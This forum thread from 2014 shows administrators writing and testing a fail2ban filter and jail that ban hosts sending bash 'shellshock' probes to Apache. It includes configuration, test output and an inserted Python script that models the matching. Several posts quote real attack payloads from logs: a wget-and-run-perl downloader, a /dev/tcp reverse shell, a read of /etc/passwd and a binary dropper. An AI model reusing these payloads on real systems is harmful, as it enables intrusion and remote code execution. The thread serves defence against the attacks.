LinuxQuestions.org
Linux - Security: This forum is for all security related questions.
Old 09-25-2014, 09:06 PM   #1
charly78
Member
 
Registered: Aug 2012
Location: Toronto,Canada
Posts: 73

Rep: Reputation: Disabled
Bash "shellshock" CVE-2014-6271 CVE-2014-7169 - Apache2 Fail2ban Filter


After some grepping of my /var/log/apache2/access.log:

Code:
grep /bin/ /var/log/apache2/access.log
123.123.123.125 - - [25/Sep/2014:04:14:19 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 411 "-" "() { :;}; /bin/ping -c 1 123.123.123.138"
123.123.123.74 - - [25/Sep/2014:17:42:32 -0400] "GET / HTTP/1.1" 200 288 "() { :; }; /bin/ping -c 1 123.123.0.123" "() { :; }; /bin/ping -c 1 123.123.0.123"

I want to make a filter that blocks out the folks if they try a few times. So far ping seems to be the most common, but then again there is a lot in there; I need to look for more things.

Code:
failregex = ^<HOST> -.*"(GET|POST).*HTTP.*"(?:%(/bin)s|%(notsureneedhelp)s)"$

At least keep some at bay. Any help would be great.
 
Old 09-25-2014, 09:29 PM   #2
unSpawn
Moderator
 
Registered: May 2001
Posts: 29,415
Blog Entries: 55

Rep: Reputation: 3600
Sorry, filtering post-op isn't a solution. Go patch instead.
 
Old 09-26-2014, 06:37 AM   #3
charly78
Member
 
Registered: Aug 2012
Location: Toronto,Canada
Posts: 73

Original Poster
Rep: Reputation: Disabled
That's just it: the patch (since I am all patched to whatever is available; most I had to do from source code because nothing is yet available) is all done on all my servers. (I have many.)

The problem is that these are just the first patches, and as we understand the problem more there will be more. In the meantime I have clear scanning already starting in my logs from experimenters and websites used to detect and look for the flaw. I do not mind that, but I would like to take persistent attempts and block them, to push folks away or at least stop them from going farther; something, anything.

So I want to be clear: I am not filtering instead of patching. I have patched but would like to take more action. The first versions of the patch (CVE-2012-3410, CVE-2014-6271, CVE-2014-7169) were found not to be fully patched.

Just patching is not enough in my opinion. If you have a webserver, just grep your logs:

Code:
grep /bin/ /var/log/apache2/access.log
89.207.135.125 - - [25/Sep/2014:04:14:19 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 411 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
198.20.69.74 - - [25/Sep/2014:17:42:32 -0400] "GET / HTTP/1.1" 200 288 "() { :; }; /bin/ping -c 1 104.131.0.69" "() { :; }; /bin/ping -c 1 104.131.0.69"
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /cgi-bin/php.fcgi HTTP/1.0" 404 401 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /cgi-bin/test.sh HTTP/1.0" 404 400 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /cgi-bin/info.sh HTTP/1.0" 404 400 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /cgi-bin/test.sh HTTP/1.0" 404 400 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /cgi-bin/php HTTP/1.0" 500 738 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /test HTTP/1.0" 404 389 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /cgi-bin/php5 HTTP/1.0" 500 738 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
 
Old 09-26-2014, 09:49 AM   #4
Habitual
LQ Veteran
 
Registered: Jan 2011
Location: Abingdon, VA
Distribution: Catalina
Posts: 9,374
Blog Entries: 37

Rep: Reputation: Disabled
How about this:
Code:
[Definition]
shellshock = ping|bash|other|...

# "/bin" cannot be an interpolation name (%(/bin)s), so the literal path goes in the regex
failregex = ^<HOST> -.*"(GET|POST).*HTTP.*"(?:/bin|%(shellshock)s).*?"
wget may be perfectly valid for some situations, so I hesitate there.

Subscribed with interest....
 
Old 09-26-2014, 09:56 AM   #5
szboardstretcher
Senior Member
 
Registered: Aug 2006
Location: Detroit, MI
Distribution: GNU/Linux systemd
Posts: 4,278

Rep: Reputation: 1694
Quote:
Originally Posted by unSpawn View Post
Sorry, filtering post-op isnt a solution. Go patch instead.
I would patch and filter. Patch first though.

Tune up your HIDS/NIDS/Snort etc rules,.. remove mod_cgi if at all possible,..
 
Old 09-26-2014, 11:12 AM   #6
charly78
Member
 
Registered: Aug 2012
Location: Toronto,Canada
Posts: 73

Original Poster
Rep: Reputation: Disabled
I am going to make a flaky attempt; maybe someone could help me on this. I agree I have things that use wget in my attempt that I know will not work. I am looking at the /bin and the error codes. I only have the logs I have and what I have seen online; maybe folks have some weird logs that show attempts, and we can help form a decent filter.

Definitely going to look closer at that, szboardstretcher.

Code:
[Definition]
shellshock = ping|bash|other|...

failregex = ^<HOST> -.*"(GET|POST).*HTTP.*"(?:%(/bin)s|%(ping)s).*?"
            ^<HOST> -.*"(GET|POST).*HTTP.*"(?:%(/bin)s|%(404 319)s).*?"
            ^<HOST> -.*"(GET|POST).*HTTP.*"(?:%(/bin)s|%(200 288)s).*?"
            ^<HOST> -.*"(GET|POST).*HTTP.*"(?:%(/bin)s|%(404 401)s).*?"
            ^<HOST> -.*"(GET|POST).*HTTP.*"(?:%(/bin)s|%(500 738)s).*?"
            ^<HOST> -.*"(GET|POST).*HTTP.*"(?:%(/bin)s|%(404 400)s).*?"
I don't think I have the right syntax, or if you get what I am saying maybe that's overkill. Trust me, I did this wrong. Habitual, can you make it like that? I see where you were going with the shellshock, but that was just some guy scanning; the folks who are dirty will not say that.

Last edited by charly78; 09-26-2014 at 11:15 AM.
 
Old 09-26-2014, 11:40 AM   #7
Habitual
LQ Veteran
 
Registered: Jan 2011
Location: Abingdon, VA
Distribution: Catalina
Posts: 9,374
Blog Entries: 37

Rep: Reputation: Disabled
9 sample records from your post above in /var/log/test.log
Code:
89.207.135.125 - - [25/Sep/2014:04:14:19 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 411 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
198.20.69.74 - - [25/Sep/2014:17:42:32 -0400] "GET / HTTP/1.1" 200 288 "() { :; }; /bin/ping -c 1 104.131.0.69" "() { :; }; /bin/ping -c 1 104.131.0.69"
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /cgi-bin/php.fcgi HTTP/1.0" 404 401 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /cgi-bin/test.sh HTTP/1.0" 404 400 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /cgi-bin/info.sh HTTP/1.0" 404 400 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /cgi-bin/test.sh HTTP/1.0" 404 400 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /cgi-bin/php HTTP/1.0" 500 738 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /test HTTP/1.0" 404 389 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /cgi-bin/php5 HTTP/1.0" 500 738 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
and the filter in /etc/fail2ban/filter.d/shellshock.conf
Code:
[Definition]

docroot = /var/www/html
failregex  = <HOST>.*\(\s*\)\s*\{[^"]*\}\s*\;[^"]+

ignoreregex =
and the test results:
Code:
fail2ban-regex /var/log/test.log  /etc/fail2ban/filter.d/shellshock.conf
Code:
Summary
=======

Addresses found:
[1]
    89.207.135.125 (Thu Sep 25 04:14:19 2014)
    198.20.69.74 (Thu Sep 25 17:42:32 2014)
    74.201.85.66 (Thu Sep 25 23:43:24 2014)
    74.201.85.66 (Thu Sep 25 23:43:24 2014)
    74.201.85.66 (Thu Sep 25 23:43:24 2014)
    74.201.85.66 (Thu Sep 25 23:43:24 2014)
    74.201.85.66 (Thu Sep 25 23:43:24 2014)
    74.201.85.66 (Thu Sep 25 23:43:24 2014)
    74.201.85.66 (Thu Sep 25 23:43:24 2014)

Date template hits:
18 hit(s): Day/MONTH/Year:Hour:Minute:Second

Success, the total number of match is 9
On Fail2Ban v0.8.10

I hope this helps.

Last edited by Habitual; 09-27-2014 at 12:53 PM. Reason: better failregex
 
Old 09-26-2014, 05:44 PM   #8
charly78
Member
 
Registered: Aug 2012
Location: Toronto,Canada
Posts: 73

Original Poster
Rep: Reputation: Disabled
So...
I got one of these today:

Code:
/var/log/apache2/access.log:54.251.83.67 - - [26/Sep/2014:12:50:48 -0400] "GET / HTTP/1.1" 200 288 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
200 288: doesn't that mean they got my host name and my kernel version? Ugh.

I am as patched up as the latest in the source and patches for bash as I can get.
 
Old 09-26-2014, 11:22 PM   #9
charly78
Member
 
Registered: Aug 2012
Location: Toronto,Canada
Posts: 73

Original Poster
Rep: Reputation: Disabled
Well, here is what I am using.
Changes updated as per below.

cat /etc/fail2ban/jail.conf
Here is the bottom of my jail.local file:
Code:
[shellshock]

enabled = true
port    = http,https
filter  = shellshock
action   = mail-whois[name=shellshock, dest=my@emailhere.co]
logpath = /var/log/apache*/access.log
maxretry = 1
And the filter put together and done by Habitual (thanks man, you rock):
cat /etc/fail2ban/filter.d/shellshock.conf
Code:
[INCLUDES]

# Read common prefixes. If any customizations available -- read them from
# common.local
#before = common.conf

[Definition]
#_daemon = apache2

# Option:  failregex
# Notes.:  regex to match the failures messages of bash in the logfile. The
#          host must be matched by a group named "host". The tag "<HOST>" can
#          be used for standard IP/hostname matching and is only an alias for
#          (?:::f{4,6}:)?(?P<host>\S+)
# Values:  TEXT
#

docroot = /var/www/html
failregex = <HOST>.*\(\s*\)\s*\{[^"]*\}\s*\;[^"]+

# Option:  ignoreregex
# Notes.:  regex to ignore. If this regex matches, the line is ignored.
# Values:  TEXT
#
ignoreregex =
I have been getting warnings from this as folks try to hit me up. I know it can become better as I see more attacks. It will at least block an IP if it's testing for something, and well, if you're patched you're at least logging an IP and blocking it too if there is another exploit. It's something, better than nothing.

Last edited by charly78; 09-27-2014 at 11:05 PM.
 
Old 09-26-2014, 11:31 PM   #10
charly78
Member
 
Registered: Aug 2012
Location: Toronto,Canada
Posts: 73

Original Poster
Rep: Reputation: Disabled
The folks at https://news.ycombinator.com/item?id=8366745 have a fellow who works at CloudFlare posting what they are getting hit with in their logs:

Code:
() { :;}; /bin/ping -c 1 198.x.x.x
() { :;}; echo shellshock-scan > /dev/udp/example.com/1234
() { ignored;};/bin/bash -i >& /dev/tcp/104.x.x.x/80 0>&1
() { test;};/usr/bin/wget http://example.com/music/file.mp3 -O ~/cgi-bin/file.mp3
() { :; }; /usr/bin/curl -A xxxx http://112.x.x.x:8011
() { :; }; /usr/bin/wget http://115.x.x.x/api/file.txt
() { :;}; echo Content-type:text/plain;echo;/bin/cat /etc/passwd
() { :; }; /bin/bash -c "if [ $(/bin/uname -m | /bin/grep 64) ]; then /usr/bin/wget 82.x.x.x:1234/v64 -O /tmp/.osock; else /usr/bin/wget 82.x.x.x:1234/v -O /tmp/.osock; fi; /bin/chmod 777 /tmp/.osock; /tmp/.osock &
 
Old 09-27-2014, 12:31 PM   #11
Habitual
LQ Veteran
 
Registered: Jan 2011
Location: Abingdon, VA
Distribution: Catalina
Posts: 9,374
Blog Entries: 37

Rep: Reputation: Disabled
It has been pointed out that my RegEx casts far too wide a net, and that my HOST string may catch and ban legitimate traffic on your site with such keywords as shopping, or scraping, or a referrer that may utilize "cgi-bin" in its referrer string.

I tested this new failregex using a duplicate line in /var/log/test using
Code:
198.20.69.74 - - [25/Sep/2014:17:42:32 -0400] "GET / HTTP/1.1" 200 288 "() { :; }; /bin/ping -c 1 104.131.0.69" "() { :; }; /bin/ping -c 1 104.131.0.69"
198.20.69.75 - - [25/Sep/2014:17:42:32 -0400] "GET / HTTP/1.1" 200 288 "() { :; }; anything here
Code:
fail2ban-regex /var/log/test.log  /etc/fail2ban/filter.d/shellshock.conf
This new failregex scans only for the function and space right after that is being abused, regardless of what that function is now, or may be in the future (a new 'variant'?)

I think it is more accurate for this purpose.
Code:
cat /etc/fail2ban/filter.d/shellshock.conf
[Definition]

docroot = /var/www/html
failregex = <HOST>.*\(\s*\)\s*\{[^"]*\}\s*\;[^"]+

ignoreregex =
I have updated http://www.linuxquestions.org/questi...9/#post5244808

Peace.

Quote:
Originally Posted by charly78 View Post
well here is what I am using

cat /etc/fail2ban/jail.conf
here is the bottom of my jail.conf file...
and you really shouldn't make your changes in /etc/fail2ban/jail.conf, but in a copy of it as /etc/fail2ban/jail.local.

Saves your bacon if you upgrade fail2ban.

and on an unpatched system, this is akin to climbing over the fence to keep the hinges 'out'

Last edited by Habitual; 09-27-2014 at 01:11 PM.
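As an added example (not code from this thread and not fail2ban's own code), here is a small Python model of what fail2ban-regex and the jail do with the filters discussed in posts #7, #11 and #12. It expands the <HOST> tag exactly as the filter comment block quoted in the thread describes, runs Habitual's final failregex and the commented-out keyword draft from charly78's filter over sample log lines, and then applies a maxretry/findtime window the way the jail would. The first five log lines are copied from the thread; the two benign lines (a referrer containing cgi-bin, and a request for a page under /docs/bash/) are constructed to show the false positives Habitual's post #11 warns about. The counting in hosts_to_ban is a simplified model of fail2ban's behaviour, not its implementation.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Expansion of the <HOST> tag, as documented in the filter comments quoted in this thread.
HOST_RE = r"(?:::f{4,6}:)?(?P<host>\S+)"

# Habitual's final failregex (post #11), verbatim.
FAILREGEX = r'<HOST>.*\(\s*\)\s*\{[^"]*\}\s*\;[^"]+'

# The commented-out keyword draft from charly78's filter (post #12), with the
# %(shellshock)s interpolation already expanded so it can be compiled directly.
KEYWORD_FAILREGEX = r'^<HOST> .*"(GET|POST) .*\/(?:ping|cgi-bin|bash|wget|curl|cat).*?"'

# Apache combined-log timestamp, e.g. [25/Sep/2014:04:14:19 -0400]
TS_RE = re.compile(r"\[(\d{2}/\w{3}/\d{4}:\d{2}:\d{2}:\d{2} [+-]\d{4})\]")

# Sample input. Lines 1-5 are from the thread; lines 6-7 are constructed benign requests
# (a referrer containing "cgi-bin", and a path under /docs/bash/) that a keyword filter
# would wrongly ban.
SAMPLE_LOG = r'''
89.207.135.125 - - [25/Sep/2014:04:14:19 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 411 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
198.20.69.74 - - [25/Sep/2014:17:42:32 -0400] "GET / HTTP/1.1" 200 288 "() { :; }; /bin/ping -c 1 104.131.0.69" "() { :; }; /bin/ping -c 1 104.131.0.69"
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /cgi-bin/php.fcgi HTTP/1.0" 404 401 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /cgi-bin/test.sh HTTP/1.0" 404 400 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
54.251.83.67 - - [26/Sep/2014:12:50:48 -0400] "GET / HTTP/1.1" 200 288 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
10.0.0.5 - - [26/Sep/2014:13:00:00 -0400] "GET /index.html HTTP/1.1" 200 1234 "http://shop.example/cgi-bin/cart.cgi?item=ping" "Mozilla/5.0 (X11; Linux x86_64) Firefox/32.0"
10.0.0.6 - - [26/Sep/2014:13:00:05 -0400] "GET /docs/bash/manual.html HTTP/1.1" 200 5678 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/32.0"
'''.strip().splitlines()


def compile_failregex(failregex):
    """Substitute the <HOST> tag the way fail2ban does, then compile the regex."""
    return re.compile(failregex.replace("<HOST>", HOST_RE))


def parse_timestamp(line):
    """Extract the Apache request time as a timezone-aware datetime."""
    m = TS_RE.search(line)
    if m is None:
        raise ValueError("no Apache timestamp in line: " + line)
    return datetime.strptime(m.group(1), "%d/%b/%Y:%H:%M:%S %z")


def matching_hosts(lines, failregex):
    """Return (host, timestamp) for each line the failregex matches (re.search, like fail2ban)."""
    pattern = compile_failregex(failregex)
    hits = []
    for line in lines:
        m = pattern.search(line)
        if m:
            hits.append((m.group("host"), parse_timestamp(line)))
    return hits


def hosts_to_ban(lines, failregex, maxretry, findtime_seconds):
    """Hosts with at least `maxretry` matches inside some `findtime_seconds` window."""
    window = timedelta(seconds=findtime_seconds)
    per_host = defaultdict(list)
    for host, ts in matching_hosts(lines, failregex):
        per_host[host].append(ts)
    banned = set()
    for host, stamps in per_host.items():
        stamps.sort()
        for i, ts in enumerate(stamps):
            # failures of this host that fall inside the window ending at `ts`
            recent = [s for s in stamps[: i + 1] if ts - s <= window]
            if len(recent) >= maxretry:
                banned.add(host)
                break
    return banned


if __name__ == "__main__":
    for label, regex in (("function-body regex", FAILREGEX), ("keyword regex", KEYWORD_FAILREGEX)):
        hits = matching_hosts(SAMPLE_LOG, regex)
        hosts = sorted({h for h, _ in hits})
        print(f"{label}: {len(hits)} hits from {hosts}")
    print("maxretry=1, findtime=600:", sorted(hosts_to_ban(SAMPLE_LOG, FAILREGEX, 1, 600)))
    print("maxretry=2, findtime=600:", sorted(hosts_to_ban(SAMPLE_LOG, FAILREGEX, 2, 600)))
```

Run it and the function-body regex reports the five probe lines only, while the keyword draft also reports 10.0.0.5 and 10.0.0.6; with maxretry=1 every probing host is banned, with maxretry=2 only 74.201.85.66, whose two requests fall within one findtime window. Before changing a live filter, the same check is what `fail2ban-regex <logfile> <filter>` gives you, as Habitual shows above.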
 
Old 10-25-2014, 11:31 AM   #12
charly78
Member
 
Registered: Aug 2012
Location: Toronto,Canada
Posts: 73

Original Poster
Rep: Reputation: Disabled
Errors

I dunno, but I seem to be getting some errors.

Here is my most recent info on the fail2ban filter:


# cat /etc/fail2ban/filter.d/shellshock.conf
Code:
[INCLUDES]

# Read common prefixes. If any customizations available -- read them from
# common.local
#before = common.conf

[Definition]

#_daemon = apache2

# Option:  failregex
# Notes.:  regex to match the failures messages of bash in the logfile. The
#          host must be matched by a group named "host". The tag "<HOST>" can
#          be used for standard IP/hostname matching and is only an alias for
#          (?:::f{4,6}:)?(?P<host>\S+)
# Values:  TEXT
#

docroot = /var/www/html
#old original method revised 09/27/14
#shellshock = ping|cgi-bin|bash|wget|curl|cat
#failregex = ^<HOST> .*"(GET|POST) .*\/(?:%(shellshock)s).*?"
failregex = <HOST>.*\(\s*\)\s*\{[^"]*\}\s*\;[^"]+

# Option:  ignoreregex
# Notes.:  regex to ignore. If this regex matches, the line is ignored.
# Values:  TEXT
#
ignoreregex =
# cat /etc/fail2ban/jail.local
Code:
[shellshock]

enabled = true
port    = http,https
filter  = shellshock
action   = mail-whois[name=shellshock, dest=shellshock@mydomain.com]
logpath = /var/log/apache*/access.log
maxretry = 1
bantime  = 29900
All seems good; it grabs and emails me a whois so I can contact the abuse email address.

Code:
cat /var/log/fail2ban.log                 
2014-10-19 04:48:03,221 fail2ban.server : INFO   Changed logging target to /var/log/fail2ban.log for Fail2ban v0.8.4-SVN
2014-10-19 04:48:03,257 fail2ban.filter : INFO   Log rotation detected for /var/log/apache2/error.log
2014-10-19 04:48:03,283 fail2ban.filter : INFO   Log rotation detected for /var/log/apache2/access.log
2014-10-19 04:48:03,597 fail2ban.filter : INFO   Log rotation detected for /var/log/apache2/error.log
2014-10-19 04:49:44,232 fail2ban.filter : INFO   Log rotation detected for /var/log/syslog
2014-10-19 04:50:01,389 fail2ban.filter : INFO   Log rotation detected for /var/log/apache2/access.log
2014-10-19 07:57:12,694 fail2ban.actions: WARNING [shellshock] Ban 5.135.35.32
2014-10-19 10:07:12,730 fail2ban.actions: WARNING [shellshock] Unban 5.135.35.32
2014-10-20 04:49:40,675 fail2ban.filter : INFO   Log rotation detected for /var/log/syslog
2014-10-20 04:49:41,294 fail2ban.filter : INFO   Log rotation detected for /var/log/auth.log
2014-10-20 04:49:41,345 fail2ban.filter : INFO   Log rotation detected for /var/log/auth.log
2014-10-20 14:16:41,563 fail2ban.actions: WARNING [dovecot-pop3imap] Ban 218.5.76.26
2014-10-20 16:26:42,220 fail2ban.actions: WARNING [dovecot-pop3imap] Unban 218.5.76.26
2014-10-21 03:34:43,863 fail2ban.actions: WARNING [shellshock] Ban 184.106.228.211
2014-10-21 04:49:37,838 fail2ban.filter : INFO   Log rotation detected for /var/log/mail.log
2014-10-21 04:49:38,210 fail2ban.filter : INFO   Log rotation detected for /var/log/mail.log
2014-10-21 04:49:38,400 fail2ban.filter : INFO   Log rotation detected for /var/log/mail.log
2014-10-21 04:49:38,676 fail2ban.filter : INFO   Log rotation detected for /var/log/syslog
2014-10-21 04:49:38,771 fail2ban.filter : INFO   Log rotation detected for /var/log/mail.log
2014-10-21 04:49:38,807 fail2ban.filter : INFO   Log rotation detected for /var/log/mail.log
2014-10-21 04:49:39,212 fail2ban.filter : INFO   Log rotation detected for /var/log/mail.log
2014-10-21 04:49:39,401 fail2ban.filter : INFO   Log rotation detected for /var/log/mail.log
2014-10-21 04:49:39,773 fail2ban.filter : INFO   Log rotation detected for /var/log/mail.log
2014-10-21 04:49:39,809 fail2ban.filter : INFO   Log rotation detected for /var/log/mail.log
2014-10-21 04:49:39,840 fail2ban.filter : INFO   Log rotation detected for /var/log/mail.log
2014-10-21 05:44:43,883 fail2ban.actions: WARNING [shellshock] Unban 184.106.228.211
2014-10-21 12:19:26,815 fail2ban.actions: WARNING [shellshock] Ban 104.192.0.18
2014-10-21 12:25:46,458 fail2ban.actions: WARNING [shellshock] 104.192.0.18 already banned
2014-10-21 14:29:27,793 fail2ban.actions: WARNING [shellshock] Unban 104.192.0.18
2014-10-22 00:14:30,322 fail2ban.jail   : INFO   Jail 'dovecot-pop3imap' stopped
2014-10-22 00:14:31,117 fail2ban.jail   : INFO   Jail 'courierauth' stopped
2014-10-22 00:14:32,093 fail2ban.jail   : INFO   Jail 'postfix' stopped
2014-10-22 00:14:32,816 fail2ban.jail   : INFO   Jail 'ssh-ddos' stopped
2014-10-22 00:14:33,161 fail2ban.jail   : INFO   Jail 'apache-multiport' stopped
2014-10-22 00:14:33,567 fail2ban.jail   : INFO   Jail 'pureftpd' stopped
2014-10-22 00:14:34,456 fail2ban.jail   : INFO   Jail 'couriersmtp' stopped
2014-10-22 00:14:35,176 fail2ban.jail   : INFO   Jail 'ssh' stopped
2014-10-22 00:14:35,718 fail2ban.jail   : INFO   Jail 'apache' stopped
2014-10-22 00:14:36,170 fail2ban.jail   : INFO   Jail 'sasl' stopped
2014-10-22 00:14:37,179 fail2ban.jail   : INFO   Jail 'shellshock' stopped
2014-10-22 00:14:37,417 fail2ban.jail   : INFO   Jail 'proftpd' stopped
2014-10-22 00:14:37,419 fail2ban.server : INFO   Exiting Fail2ban
2014-10-22 00:14:37,694 fail2ban.server : INFO   Changed logging target to /var/log/fail2ban.log for Fail2ban v0.8.4-SVN
2014-10-22 00:14:37,695 fail2ban.jail   : INFO   Creating new jail 'dovecot-pop3imap'
2014-10-22 00:14:37,695 fail2ban.jail   : INFO   Jail 'dovecot-pop3imap' uses poller
2014-10-22 00:14:37,707 fail2ban.filter : INFO   Added logfile = /var/log/mail.log
2014-10-22 00:14:37,707 fail2ban.filter : INFO   Set maxRetry = 5
2014-10-22 00:14:37,708 fail2ban.filter : INFO   Set findtime = 600
2014-10-22 00:14:37,708 fail2ban.actions: INFO   Set banTime = 7800
2014-10-22 00:14:37,712 fail2ban.jail   : INFO   Creating new jail 'pam-generic'
2014-10-22 00:14:37,712 fail2ban.jail   : INFO   Jail 'pam-generic' uses poller
2014-10-22 00:14:37,713 fail2ban.filter : INFO   Added logfile = /var/log/auth.log
2014-10-22 00:14:37,713 fail2ban.filter : INFO   Set maxRetry = 4
2014-10-22 00:14:37,714 fail2ban.filter : INFO   Set findtime = 600
2014-10-22 00:14:37,714 fail2ban.actions: INFO   Set banTime = 7800
2014-10-22 00:14:37,719 fail2ban.jail   : INFO   Creating new jail 'ssh-ddos'
2014-10-22 00:14:37,719 fail2ban.jail   : INFO   Jail 'ssh-ddos' uses poller
2014-10-22 00:14:37,719 fail2ban.filter : INFO   Added logfile = /var/log/auth.log
2014-10-22 00:14:37,720 fail2ban.filter : INFO   Set maxRetry = 4
2014-10-22 00:14:37,720 fail2ban.filter : INFO   Set findtime = 600
2014-10-22 00:14:37,720 fail2ban.actions: INFO   Set banTime = 7800
2014-10-22 00:14:37,724 fail2ban.jail   : INFO   Creating new jail 'apache-multiport'
2014-10-22 00:14:37,724 fail2ban.jail   : INFO   Jail 'apache-multiport' uses poller
2014-10-22 00:14:37,725 fail2ban.filter : INFO   Added logfile = /var/log/apache2/error.log
2014-10-22 00:14:37,725 fail2ban.filter : INFO   Set maxRetry = 4
2014-10-22 00:14:37,725 fail2ban.filter : INFO   Set findtime = 600
2014-10-22 00:14:37,726 fail2ban.actions: INFO   Set banTime = 7800
2014-10-22 00:14:37,729 fail2ban.jail   : INFO   Creating new jail 'apache-overflows'
2014-10-22 00:14:37,729 fail2ban.jail   : INFO   Jail 'apache-overflows' uses poller
2014-10-22 00:14:37,730 fail2ban.filter : INFO   Added logfile = /var/log/apache2/error.log
2014-10-22 00:14:37,730 fail2ban.filter : INFO   Set maxRetry = 2
2014-10-22 00:14:37,731 fail2ban.filter : INFO   Set findtime = 600
2014-10-22 00:14:37,731 fail2ban.actions: INFO   Set banTime = 7800
2014-10-22 00:14:37,735 fail2ban.jail   : INFO   Creating new jail 'couriersmtp'
2014-10-22 00:14:37,735 fail2ban.jail   : INFO   Jail 'couriersmtp' uses poller
2014-10-22 00:14:37,735 fail2ban.filter : INFO   Added logfile = /var/log/mail.log
2014-10-22 00:14:37,736 fail2ban.filter : INFO   Set maxRetry = 3
2014-10-22 00:14:37,736 fail2ban.filter : INFO   Set findtime = 600
2014-10-22 00:14:37,737 fail2ban.actions: INFO   Set banTime = 7800
2014-10-22 00:14:37,740 fail2ban.jail   : INFO   Creating new jail 'pureftpd'
2014-10-22 00:14:37,740 fail2ban.jail   : INFO   Jail 'pureftpd' uses poller
2014-10-22 00:14:37,740 fail2ban.filter : INFO   Added logfile = /var/log/syslog
2014-10-22 00:14:37,741 fail2ban.filter : INFO   Set maxRetry = 3
2014-10-22 00:14:37,741 fail2ban.filter : INFO   Set findtime = 600
2014-10-22 00:14:37,742 fail2ban.actions: INFO   Set banTime = 7800
2014-10-22 00:14:37,745 fail2ban.jail   : INFO   Creating new jail 'ssh'
2014-10-22 00:14:37,745 fail2ban.jail   : INFO   Jail 'ssh' uses poller
2014-10-22 00:14:37,746 fail2ban.filter : INFO   Added logfile = /var/log/auth.log
2014-10-22 00:14:37,746 fail2ban.filter : INFO   Set maxRetry = 3
2014-10-22 00:14:37,746 fail2ban.filter : INFO   Set findtime = 600
2014-10-22 00:14:37,747 fail2ban.actions: INFO   Set banTime = 7800
2014-10-22 00:14:37,816 fail2ban.jail   : INFO   Creating new jail 'postfix'
2014-10-22 00:14:37,816 fail2ban.jail   : INFO   Jail 'postfix' uses poller
2014-10-22 00:14:37,816 fail2ban.filter : INFO   Added logfile = /var/log/mail.log
2014-10-22 00:14:37,817 fail2ban.filter : INFO   Set maxRetry = 3
2014-10-22 00:14:37,817 fail2ban.filter : INFO   Set findtime = 600
2014-10-22 00:14:37,818 fail2ban.actions: INFO   Set banTime = 7800
2014-10-22 00:14:37,821 fail2ban.jail   : INFO   Creating new jail 'sasl'
2014-10-22 00:14:37,821 fail2ban.jail   : INFO   Jail 'sasl' uses poller
2014-10-22 00:14:37,821 fail2ban.filter : INFO   Added logfile = /var/log/mail.log
2014-10-22 00:14:37,822 fail2ban.filter : INFO   Set maxRetry = 3
